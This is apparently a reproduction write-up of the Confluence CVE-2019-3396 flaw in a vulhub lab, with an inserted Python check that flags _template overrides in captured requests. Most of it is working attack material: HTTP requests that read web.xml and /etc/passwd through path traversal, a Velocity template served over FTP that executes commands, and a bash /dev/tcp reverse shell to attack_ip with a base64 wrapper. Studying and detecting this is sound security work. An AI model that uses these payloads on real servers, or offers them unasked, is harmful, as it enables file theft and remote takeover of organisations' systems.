
CVE-2019-3396 Atlassian Confluence path traversal and command execution vulnerability: reproduction

Author: Internet


0x01. Environment setup

Set up the vulnerable target with vulhub's docker-compose environment:

service docker start
docker-compose up -d


Check which ports are exposed:

docker-compose ps


Two ports are mapped: the database port and the web port (8090).

Visiting http://target_ip:8090 brings up the setup wizard. Choose "Trial installation"; you are then asked for a license key. Click "Get an evaluation license" and request a Confluence Server evaluation license from Atlassian (do not pick Data Center or Addons, and choose "not installed yet").


It then redirects back to the setup page with the license filled in automatically.


Click Next to install. On a low-memory VPS this step may fail or take a long time (a machine with at least 4 GB of RAM is recommended for installing and testing); be patient.

If asked for a cluster node, enter /home/confluence as the path.


You may then be asked for database credentials: choose the PostgreSQL database, host db, username and password both postgres.


The remaining steps can be filled in however you like.


0x02. Vulnerability reproduction

Path traversal

Sending the following request to the macro preview endpoint reads web.xml through the _template parameter of the widget macro:

POST /rest/tinymce/1/macro/preview HTTP/1.1
Host: target_ip:8090
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: http://target_ip:8090/pages/resumedraft.action?draftId=786457&draftShareId=056b55bc-fc4a-487b-b1e1-8f673f280c23&
Content-Type: application/json; charset=utf-8
Content-Length: 168

{"contentId":"786458","macro":{"name":"widget","body":"","params":{"url":"https://www.viddler.com/v/23464dc6","width":"1000","height":"1000","_template":"../web.xml"}}}

I captured a request first and then modified it myself:

POST /rest/tinymce/1/macro/preview HTTP/1.1
Host: target_ip:8090
Content-Length: 168
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36 Edg/89.0.774.68
Content-Type: application/json
Origin: http://target_ip:8090
Referer: http://target_ip:8090/collector/pages.action?key=SPC
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6
Cookie: CFADMIN_LASTPAGE_ADMIN=%2FCFIDE%2Fadministrator%2Fhomepage%2Ecfm; JSESSIONID=232F54EFE4F60A79C8BCE610F69B43AF; seraph.confluence=524289%3A48e4dbe7a203952e4258c9a5ff33e5d0ada6196c
Connection: close

{"contentId":"786458","macro":{"name":"widget","body":"","params":{"url":"https://www.viddler.com/v/23464dc6","width":"1000","height":"1000","_template":"../web.xml"}}}

web.xml is read successfully:


Confluence before 6.12 placed no restriction on the protocol or the path used to load the template, so changing the value of the _template parameter in the request gives local file inclusion; file:///etc/passwd reads that file:

POST /rest/tinymce/1/macro/preview HTTP/1.1
Host: target_ip:8090
Content-Length: 176
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36 Edg/89.0.774.68
Content-Type: application/json
Origin: http://target_ip:8090
Referer: http://target_ip:8090/collector/pages.action?key=SPC
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6
Cookie: CFADMIN_LASTPAGE_ADMIN=%2FCFIDE%2Fadministrator%2Fhomepage%2Ecfm; JSESSIONID=232F54EFE4F60A79C8BCE610F69B43AF; seraph.confluence=524289%3A48e4dbe7a203952e4258c9a5ff33e5d0ada6196c
Connection: close

{"contentId":"786458","macro":{"name":"widget","body":"","params":{"url":"https://www.viddler.com/v/23464dc6","width":"1000","height":"1000","_template":"file:///etc/passwd"}}}
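A check a defender would want for the two requests above, added here as an example; it is not code from the original post, from vulhub or from Atlassian. It parses captured macro-preview request bodies (the samples at the bottom are constructed to mirror the page's payloads) and flags any body that sets `_template`, classifying the value as a traversal, a URL scheme such as file: or ftp:, or a bare template name, and listing parameters the widget macro does not normally carry, such as `command`. The set of legitimate widget parameters is an assumption taken from the requests on this page.

```python
import json
from typing import List, Optional, Tuple

# Added example, not part of the original post: a check for the _template
# override described above, meant for POST bodies captured at a reverse
# proxy or WAF in front of Confluence. All sample bodies are constructed.

# Parameters the widget macro sends in the page's own requests (assumption).
KNOWN_WIDGET_PARAMS = {"url", "width", "height"}


def template_override(body: bytes) -> Optional[Tuple[str, List[str]]]:
    """Return (_template value, unexpected extra parameter names) for a
    macro-preview body that sets _template; None for malformed or unrelated bodies."""
    try:
        doc = json.loads(body)
    except (ValueError, UnicodeDecodeError):
        return None
    macro = doc.get("macro") if isinstance(doc, dict) else None
    params = macro.get("params") if isinstance(macro, dict) else None
    if not isinstance(params, dict) or not isinstance(params.get("_template"), str):
        return None
    extra = sorted(k for k in params if k not in KNOWN_WIDGET_PARAMS | {"_template"})
    return params["_template"], extra


def classify_template(value: str) -> str:
    """'traversal' for any ../ or ..\\ segment, 'scheme:<s>' for file:, ftp:,
    http(s): and the like, 'name' for a bare template name (still an override
    the UI never sends, so still worth logging)."""
    v = value.strip().lower()
    if ".." in v.replace("\\", "/").split("/"):
        return "traversal"
    scheme, sep, _ = v.partition(":")
    if sep and scheme.isalpha():
        return "scheme:" + scheme
    return "name"


def scan(bodies) -> List[Tuple[int, str, str, List[str]]]:
    """(index, verdict, _template, extra params) for every body that overrides the template."""
    findings = []
    for i, body in enumerate(bodies):
        hit = template_override(body)
        if hit is None:
            continue
        template, extra = hit
        findings.append((i, classify_template(template), template, extra))
    return findings


# Constructed samples: a normal preview, the three payload shapes from the
# page (web.xml, /etc/passwd, remote r.vm plus a command), and garbage.
SAMPLE_BODIES = [
    b'{"contentId":"786458","macro":{"name":"widget","body":"","params":{"url":"https://www.viddler.com/v/23464dc6","width":"1000","height":"1000"}}}',
    b'{"contentId":"786458","macro":{"name":"widget","body":"","params":{"url":"https://www.viddler.com/v/23464dc6","width":"1000","height":"1000","_template":"../web.xml"}}}',
    b'{"contentId":"786458","macro":{"name":"widget","body":"","params":{"url":"https://www.viddler.com/v/23464dc6","width":"1000","height":"1000","_template":"file:///etc/passwd"}}}',
    b'{"contentId":"786458","macro":{"name":"widget","body":"","params":{"url":"https://www.viddler.com/v/23464dc6","width":"1000","height":"1000","_template":"ftp://attack_ip:8888/r.vm","command":"id"}}}',
    b"not json at all",
]

if __name__ == "__main__":
    for index, verdict, template, extra in scan(SAMPLE_BODIES):
        print(f"body #{index}: {verdict:<12} _template={template!r} extra_params={extra}")
```

The traversal test runs before the scheme test on purpose, so `ftp://host/../x.vm` is reported as traversal rather than as a plain remote load; both verdicts should page someone, but the distinction matters when you later count which class an attacker tried first.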


Remote code execution

The value of _template can also point at a remote file. The https scheme is supported; plain http could not be exploited at the time of writing. The steps below serve the template over FTP instead.

Start a simple FTP server with python3 -m pyftpdlib -p <port>:

python3 -m pip install pyftpdlib
python3 -m pyftpdlib -p 8888


In the directory the FTP server is serving (its working directory), create a file named r.vm with the following content:

## Velocity template loaded as the widget macro's _template; $command is the "command" macro parameter
#set ($exp="exp")
## any String is an Object, so getClass().forName() reaches Runtime.getRuntime().exec($command) by reflection
#set ($a=$exp.getClass().forName("java.lang.Runtime").getMethod("getRuntime",null).invoke(null,null).exec($command))
#set ($input=$exp.getClass().forName("java.lang.Process").getMethod("getInputStream").invoke($a))
## read the process's stdout with a Scanner; delimiter \A makes the whole output a single token
#set($sc = $exp.getClass().forName("java.util.Scanner"))
#set($constructor = $sc.getDeclaredConstructor($exp.getClass().forName("java.io.InputStream")))
#set($scan=$constructor.newInstance($input).useDelimiter("\\A"))
#if($scan.hasNext())
    $scan.next()
#end

Set _template to ftp://attack_ip:8888/r.vm and add a command parameter after it with the value id. The macro parameters are placed in the Velocity context, so $command in r.vm resolves to that value:

POST /rest/tinymce/1/macro/preview HTTP/1.1
Host: target_ip:8090
Content-Length: 198
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36 Edg/89.0.774.68
Content-Type: application/json
Origin: http://target_ip:8090
Referer: http://target_ip:8090/collector/pages.action?key=SPC
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6
Cookie: CFADMIN_LASTPAGE_ADMIN=%2FCFIDE%2Fadministrator%2Fhomepage%2Ecfm; JSESSIONID=232F54EFE4F60A79C8BCE610F69B43AF; seraph.confluence=524289%3A48e4dbe7a203952e4258c9a5ff33e5d0ada6196c
Connection: close

{"contentId":"786458","macro":{"name":"widget","body":"","params":{"url":"https://www.viddler.com/v/23464dc6","width":"1000","height":"1000","_template":"ftp://attack_ip:8888/r.vm","command":"id"}}}

After the request is sent, the command executes and its output comes back in the response:


Trying a reverse shell

Runtime.exec() does not go through a shell, so the redirections and pipes in a bash reverse shell are not interpreted. Base64-encode the command to get around this and use the encoded form as the command value (generator: http://jackson-t.ca/runtime-exec-payloads.html):

bash -i >& /dev/tcp/attack_ip/7777 0>&1   # reverse shell; this line is what gets base64-encoded
bash -c {echo,<base64 of the line above>}|{base64,-d}|{bash,-i}


Listen on port 7777 on the attacking machine; after the request is sent, the reverse shell connects back.


Source: https://www.cnblogs.com/-Anguvia-/p/14618509.html